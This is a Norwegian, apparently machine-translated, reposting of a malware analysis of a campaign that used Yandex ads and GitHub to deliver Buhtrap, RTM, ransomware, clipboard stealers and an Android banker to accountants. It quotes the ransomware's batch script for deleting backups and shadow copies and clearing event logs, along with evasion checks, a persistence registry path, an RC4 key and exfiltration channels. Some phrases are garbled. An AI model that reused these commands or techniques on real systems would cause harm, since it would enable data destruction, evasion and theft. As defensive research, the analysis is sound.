For å målrette regnskapsførere i et nettangrep kan du bruke arbeidsdokumenter de søker etter på nettet. Dette er omtrent hva en cybergruppe har gjort de siste månedene, og distribuert kjente bakdører. и , samt krypteringer og programvare for å stjele kryptovalutaer. De fleste målene er lokalisert i Russland. Angrepet ble utført ved å plassere ondsinnet reklame på Yandex.Direct. Potensielle ofre ble henvist til et nettsted hvor de ble bedt om å laste ned en ondsinnet fil forkledd som en dokumentmal. Yandex fjernet den ondsinnede reklamen etter advarselen vår.
Buhtraps kildekode har blitt lekket på nettet tidligere, slik at alle kan bruke den. Vi har ingen informasjon om tilgjengelighet av RTM-kode.
I dette innlegget vil vi fortelle deg hvordan angriperne distribuerte skadevare ved hjelp av Yandex.Direct og hostet det på GitHub. Innlegget vil avsluttes med en teknisk analyse av skadelig programvare.
Buhtrap og RTM er tilbake i virksomhet
Mekanisme for spredning og ofre
De ulike nyttelastene som leveres til ofrene deler en felles forplantningsmekanisme. Alle ondsinnede filer opprettet av angriperne ble plassert i to forskjellige GitHub-lagre.
Vanligvis inneholdt depotet én nedlastbar ondsinnet fil, som endret seg ofte. Siden GitHub lar deg se historikken for endringer i et depot, kan vi se hvilken skadelig programvare som ble distribuert i løpet av en viss periode. For å overbevise offeret om å laste ned den ondsinnede filen ble nettstedet blanki-shabloni24[.]ru, vist i figuren over, brukt.
Utformingen av nettstedet og alle navnene på de ondsinnede filene følger et enkelt konsept - skjemaer, maler, kontrakter, prøver osv. Med tanke på at Buhtrap og RTM-programvare allerede har blitt brukt i angrep på regnskapsførere tidligere, antok vi at strategien i den nye kampanjen er den samme. Spørsmålet er bare hvordan offeret kom til angripernes nettsted.
infeksjon
Minst flere potensielle ofre som havnet på denne siden ble tiltrukket av ondsinnet reklame. Nedenfor er et eksempel på URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Som du kan se fra lenken, ble banneret lagt ut på det legitime regnskapsforumet bb.f2[.]kz. Det er viktig å merke seg at bannerne dukket opp på forskjellige nettsteder, alle hadde samme kampanje-ID (blanki_rsya), og de fleste relatert til regnskap eller juridisk bistand. URL-en viser at det potensielle offeret brukte forespørselen «last ned fakturaskjema», som støtter vår hypotese om målrettede angrep. Nedenfor er nettstedene der bannerne dukket opp og de tilsvarende søkene.
- last ned fakturaskjema – bb.f2[.]kz
- prøvekontrakt - Ipopen[.]ru
- prøve på søknadsklage - 77metrov[.]ru
- avtaleskjema - blank-dogovor-kupli-prodazhi[.]ru
- prøverettsbegjæring - zen.yandex[.]ru
- prøveklage - yurday[.]ru
- eksempler på kontraktsskjemaer – Regforum[.]ru
- kontraktsform – assistentus[.]ru
- eksempel leilighetsavtale – napravah[.]com
- prøver av juridiske kontrakter - avito[.]ru
Siden blanki-shabloni24[.]ru kan ha blitt konfigurert til å bestå en enkel visuell vurdering. Vanligvis virker ikke en annonse som peker til et profesjonelt utseende nettsted med en lenke til GitHub som noe åpenbart dårlig. I tillegg lastet angriperne opp ondsinnede filer til depotet bare i en begrenset periode, sannsynligvis under kampanjen. Mesteparten av tiden inneholdt GitHub-depotet et tomt zip-arkiv eller en tom EXE-fil. Dermed kunne angripere distribuere reklame gjennom Yandex.Direct på nettsteder som mest sannsynlig ble besøkt av regnskapsførere som kom som svar på spesifikke søk.
La oss deretter se på de forskjellige nyttelastene fordelt på denne måten.
Nyttelastanalyse
Kronologi for distribusjon
Den ondsinnede kampanjen startet i slutten av oktober 2018 og er aktiv i skrivende stund. Siden hele depotet var offentlig tilgjengelig på GitHub, kompilerte vi en nøyaktig tidslinje for distribusjonen av seks forskjellige skadevarefamilier (se figuren nedenfor). Vi har lagt til en linje som viser når bannerkoblingen ble oppdaget, målt av ESET-telemetri, for sammenligning med git-historikk. Som du kan se, korrelerer dette godt med tilgjengeligheten av nyttelasten på GitHub. Avviket i slutten av februar kan forklares med at vi ikke hadde en del av endringshistorikken fordi depotet ble fjernet fra GitHub før vi kunne få det i sin helhet.
Figur 1. Kronologi for distribusjon av skadelig programvare.
Kodesigneringssertifikater
Kampanjen brukte flere sertifikater. Noen ble signert av mer enn én skadevarefamilie, noe som ytterligere indikerer at forskjellige prøver tilhørte samme kampanje. Til tross for tilgjengeligheten av den private nøkkelen, signerte ikke operatørene systematisk binærfilene og brukte ikke nøkkelen for alle prøvene. I slutten av februar 2019 begynte angripere å lage ugyldige signaturer ved å bruke et Google-eid sertifikat som de ikke hadde den private nøkkelen til.
Alle sertifikater involvert i kampanjen og skadevarefamiliene de signerer er oppført i tabellen nedenfor.
Vi har også brukt disse kodesigneringssertifikatene for å etablere koblinger med andre skadevarefamilier. For de fleste sertifikater fant vi ikke prøver som ikke ble distribuert gjennom et GitHub-lager. TOV "MARIYA"-sertifikatet ble imidlertid brukt til å signere skadelig programvare som tilhører botnettet , adware og gruvearbeidere. Det er usannsynlig at denne skadelige programvaren er relatert til denne kampanjen. Mest sannsynlig ble sertifikatet kjøpt på darknet.
Win32/Filecoder.Buhtrap
Den første komponenten som fanget vår oppmerksomhet var den nyoppdagede Win32/Filecoder.Buhtrap. Dette er en Delphi binær fil som noen ganger er pakket. Den ble hovedsakelig distribuert i februar–mars 2019. Det oppfører seg som det sømmer seg et løsepengeprogram – det søker etter lokale stasjoner og nettverksmapper og krypterer de oppdagede filene. Den trenger ikke en Internett-tilkobling for å bli kompromittert fordi den ikke kontakter serveren for å sende krypteringsnøkler. I stedet legger den til et "token" på slutten av løsepengemeldingen, og foreslår å bruke e-post eller Bitmessage for å kontakte operatører.
For å kryptere så mange sensitive ressurser som mulig, kjører Filecoder.Buhtrap en tråd utviklet for å stenge nøkkelprogramvare som kan ha åpne filbehandlere som inneholder verdifull informasjon som kan forstyrre kryptering. Målprosessene er hovedsakelig databasestyringssystemer (DBMS). I tillegg sletter Filecoder.Buhtrap loggfiler og sikkerhetskopier for å gjøre datagjenoppretting vanskelig. For å gjøre dette, kjør batchskriptet nedenfor.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap bruker en legitim online IP Logger-tjeneste designet for å samle inn informasjon om besøkende på nettstedet. Dette er ment å spore ofre for løsepengevaren, som er ansvaret til kommandolinjen:
mshta.exe "javascript:document.write('');"
Filer for kryptering velges hvis de ikke samsvarer med tre ekskluderingslister. For det første er ikke filer med følgende utvidelser kryptert: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys og .flaggermus. For det andre er alle filer der den fullstendige banen inneholder katalogstrenger fra listen nedenfor ekskludert.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
For det tredje er visse filnavn også ekskludert fra kryptering, blant dem filnavnet på løsepengemeldingen. Listen er presentert nedenfor. Alle disse unntakene er åpenbart ment for å holde maskinen i gang, men med minimal trafikksikkerhet.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Filkrypteringsskjema
Når den er utført, genererer skadelig programvare et 512-bits RSA-nøkkelpar. Den private eksponenten (d) og modulen (n) blir deretter kryptert med en hardkodet 2048-bits offentlig nøkkel (offentlig eksponent og modul), zlib-pakket og base64-kodet. Koden som er ansvarlig for dette er vist i figur 2.
Figur 2. Resultat av Hex-Rays-dekompilering av 512-biters RSA-nøkkelpargenereringsprosessen.
Nedenfor er et eksempel på ren tekst med en generert privat nøkkel, som er et symbol knyttet til løsepengemeldingen.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Angripernes offentlige nøkkel er gitt nedenfor.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Filene er kryptert med AES-128-CBC med en 256-bits nøkkel. For hver kryptert fil genereres en ny nøkkel og en ny initialiseringsvektor. Nøkkelinformasjonen legges til på slutten av den krypterte filen. La oss vurdere formatet til den krypterte filen.
Krypterte filer har følgende overskrift:
Kildefildataene med tillegg av den magiske VEGA-verdien er kryptert til de første 0x5000 byte. All dekrypteringsinformasjon er vedlagt en fil med følgende struktur:
- Filstørrelsesmarkøren inneholder et merke som indikerer om filen er større enn 0x5000 byte stor
— AES-nøkkelblob = ZlibCompress(RSAEncrypt(AES-nøkkel + IV, offentlig nøkkel til det genererte RSA-nøkkelparet))
- RSA-nøkkelblob = ZlibCompress(RSAEncrypt(generert RSA privat nøkkel, hardkodet RSA offentlig nøkkel))
Win32/ClipBanker
Win32/ClipBanker er en komponent som ble distribuert med jevne mellomrom fra slutten av oktober til begynnelsen av desember 2018. Dens rolle er å overvåke innholdet på utklippstavlen, den ser etter adresser til kryptovaluta-lommebøker. Etter å ha bestemt mållommebokadressen, erstatter ClipBanker den med en adresse som antas å tilhøre operatørene. Prøvene vi undersøkte var verken eske eller uklare. Den eneste mekanismen som brukes til å maskere atferd er strengkryptering. Operatørlommebokadresser er kryptert med RC4. Målkryptovalutaer er Bitcoin, Bitcoin cash, Dogecoin, Ethereum og Ripple.
I løpet av perioden malwaren spredte seg til angripernes Bitcoin-lommebøker, ble et lite beløp sendt til VTS, noe som sår tvil om kampanjens suksess. I tillegg er det ingen bevis som tyder på at disse transaksjonene var relatert til ClipBanker i det hele tatt.
Win32/RTM
Win32/RTM-komponenten ble distribuert i flere dager tidlig i mars 2019. RTM er en trojansk bankmann skrevet i Delphi, rettet mot eksterne banksystemer. I 2017 publiserte ESET-forskere av dette programmet er beskrivelsen fortsatt relevant. I januar 2019 ga Palo Alto Networks også ut .
Buhtrap-laster
I noen tid var en nedlaster tilgjengelig på GitHub som ikke var lik tidligere Buhtrap-verktøy. Han snur seg til https://94.100.18[.]67/RSS.php?<some_id> for å få neste trinn og laster den direkte inn i minnet. Vi kan skille mellom to virkemåter for andre trinns kode. I den første URLen passerte RSS.php Buhtrap-bakdøren direkte - denne bakdøren er veldig lik den som var tilgjengelig etter at kildekoden ble lekket.
Interessant nok ser vi flere kampanjer med Buhtrap-bakdøren, og de er angivelig drevet av forskjellige operatører. I dette tilfellet er hovedforskjellen at bakdøren lastes direkte inn i minnet og ikke bruker den vanlige ordningen med DLL-distribusjonsprosessen som vi snakket om . I tillegg endret operatørene RC4-nøkkelen som ble brukt til å kryptere nettverkstrafikk til C&C-serveren. I de fleste kampanjene vi har sett, gadd ikke operatørene å endre denne nøkkelen.
Den andre, mer komplekse oppførselen var at RSS.php URL ble sendt til en annen laster. Den implementerte noe uklarhet, for eksempel gjenoppbygging av den dynamiske importtabellen. Formålet med oppstartslasteren er å kontakte C&C-serveren [.]com/api/F27F84EDA4D13B15/2, send loggene og vent på svar. Den behandler responsen som en blob, laster den inn i minnet og utfører den. Nyttelasten vi så utføre denne lasteren var den samme Buhtrap-bakdøren, men det kan være andre komponenter.
Android/Spy.Banker
Interessant nok ble det også funnet en komponent for Android i GitHub-depotet. Han var i hovedavdelingen i bare én dag – 1. november 2018. Bortsett fra å bli lagt ut på GitHub, finner ESET telemetri ingen bevis på at denne skadelige programvaren blir distribuert.
Komponenten ble hostet som en Android Application Package (APK). Det er sterkt tilslørt. Den ondsinnede oppførselen er skjult i en kryptert JAR som ligger i APK-en. Den er kryptert med RC4 med denne nøkkelen:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Den samme nøkkelen og algoritmen brukes til å kryptere strenger. JAR er lokalisert i APK_ROOT + image/files. De første 4 bytene av filen inneholder lengden på den krypterte JAR-en, som begynner umiddelbart etter lengdefeltet.
Etter å ha dekryptert filen, oppdaget vi at det var Anubis - tidligere banker for Android. Skadevaren har følgende funksjoner:
- mikrofonopptak
- tar skjermbilder
- få GPS-koordinater
- keylogger
- enhetsdatakryptering og krav om løsepenger
- sende spam
Interessant nok brukte bankmannen Twitter som en backup-kommunikasjonskanal for å få tak i en annen C&C-server. Prøven vi analyserte brukte @JonesTrader-kontoen, men på analysetidspunktet var den allerede blokkert.
Bankmannen inneholder en liste over målapplikasjoner på Android-enheten. Den er lengre enn listen oppnådd i Sophos-studien. Listen inkluderer mange bankapplikasjoner, netthandelsprogrammer som Amazon og eBay, og kryptovalutatjenester.
MSIL/ClipBanker.IH
Den siste komponenten som ble distribuert som en del av denne kampanjen, var den kjørbare .NET Windows-filen, som dukket opp i mars 2019. De fleste av de studerte versjonene var pakket med ConfuserEx v1.0.0. I likhet med ClipBanker bruker denne komponenten utklippstavlen. Målet hans er et bredt spekter av kryptovalutaer, samt tilbud på Steam. I tillegg bruker han IP Logger-tjenesten for å stjele Bitcoin private WIF-nøkkel.
Beskyttelsesmekanismer
I tillegg til fordelene som ConfuserEx gir for å forhindre feilsøking, dumping og tukling, inkluderer komponenten muligheten til å oppdage antivirusprodukter og virtuelle maskiner.
For å verifisere at den kjører i en virtuell maskin, bruker skadelig programvare den innebygde Windows WMI-kommandolinjen (WMIC) for å be om BIOS-informasjon, nemlig:
wmic bios
Deretter analyserer programmet kommandoutgangen og ser etter nøkkelord: VBOX, VirtualBox, XEN, qemu, bochs, VM.
For å oppdage antivirusprodukter sender skadelig programvare en Windows Management Instrumentation-forespørsel (WMI) til Windows Security Center ved hjelp av ManagementObjectSearcher API som vist nedenfor. Etter dekoding fra base64 ser samtalen slik ut:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Figur 3. Prosess for å identifisere antivirusprodukter.
I tillegg sjekker skadevaren om , et verktøy for å beskytte mot utklippstavleangrep og, hvis det kjøres, suspenderer alle tråder i den prosessen, og deaktiverer dermed beskyttelsen.
Standhaftighet
Versjonen av skadelig programvare vi studerte kopierer seg selv inn %APPDATA%googleupdater.exe og setter "skjult"-attributtet for Google-katalogen. Så endrer hun verdien SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell i Windows-registeret og legger til banen updater.exe. På denne måten vil skadelig programvare bli utført hver gang brukeren logger på.
Ondsinnet oppførsel
I likhet med ClipBanker overvåker skadelig programvare innholdet på utklippstavlen og ser etter cryptocurrency-lommebokadresser, og når den blir funnet, erstatter den med en av operatørens adresser. Nedenfor er en liste over måladresser basert på hva som finnes i koden.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
For hver type adresse er det et tilsvarende regulært uttrykk. STEAM_URL-verdien brukes til å angripe Steam-systemet, som man kan se fra det regulære uttrykket som brukes til å definere i bufferen:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Eksfiltrasjonskanal
I tillegg til å erstatte adresser i bufferen, er skadelig programvare rettet mot de private WIF-nøklene til Bitcoin, Bitcoin Core og Electrum Bitcoin-lommebøker. Programmet bruker plogger.org som en eksfiltreringskanal for å få tak i den private WIF-nøkkelen. For å gjøre dette legger operatører til private nøkkeldata til User-Agent HTTP-headeren, som vist nedenfor.
Figur 4. IP Logger-konsoll med utdata.
Operatører brukte ikke iplogger.org til å eksfiltrere lommebøker. De brukte sannsynligvis en annen metode på grunn av grensen på 255 tegn i feltet User-Agentvises i IP Logger-nettgrensesnittet. I prøvene vi studerte ble den andre utdataserveren lagret i miljøvariabelen DiscordWebHook. Overraskende nok er denne miljøvariabelen ikke tildelt noe sted i koden. Dette antyder at skadevaren fortsatt er under utvikling og variabelen er tilordnet operatørens testmaskin.
Det er et annet tegn på at programmet er under utvikling. Den binære filen inkluderer to iplogger.org-URLer, og begge spørres når data eksfiltreres. I en forespørsel til en av disse URL-ene er verdien i Referer-feltet foran "DEV /". Vi fant også en versjon som ikke ble pakket med ConfuserEx, mottakeren for denne URLen heter DevFeedbackUrl. Basert på miljøvariabelnavnet tror vi at operatørene planlegger å bruke den legitime tjenesten Discord og dets nettavlyttingssystem for å stjele kryptovaluta-lommebøker.
Konklusjon
Denne kampanjen er et eksempel på bruk av legitime reklametjenester i cyberangrep. Ordningen retter seg mot russiske organisasjoner, men vi ville ikke bli overrasket over å se et slikt angrep ved bruk av ikke-russiske tjenester. For å unngå kompromisser må brukere være trygge på omdømmet til kilden til programvaren de laster ned.
En fullstendig liste over indikatorer for kompromiss og MITER ATT&CK-attributter er tilgjengelig på .
Kilde: www.habr.com